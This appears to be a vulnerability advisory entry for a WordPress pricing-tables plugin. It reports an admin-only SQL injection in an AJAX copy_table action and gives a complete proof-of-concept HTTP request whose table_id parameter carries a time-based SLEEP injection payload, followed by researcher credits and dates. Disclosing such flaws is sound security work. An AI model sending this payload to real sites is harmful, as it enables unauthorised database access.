The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high-privilege users such as admins.
POST /wp-admin/admin-ajax.php HTTP/1.1 Host: localhost Content-Length: 115 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: https://localhost/wp-admin/admin.php?page=ap-pricing-tables-lite Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: [Admin+] Connection: close action=backend_ajax&_action=copy_table&table_id=124+AND+(SELECT+2035+FROM+(SELECT(SLEEP(10)))A)&_wpnonce=<nonce>
Simone Onofri, Donato Onofri
Simone Onofri, Donato Onofri
Yes
2023-05-10 (about 4 months ago)
2023-05-10 (about 4 months ago)
2023-05-10 (about 4 months ago)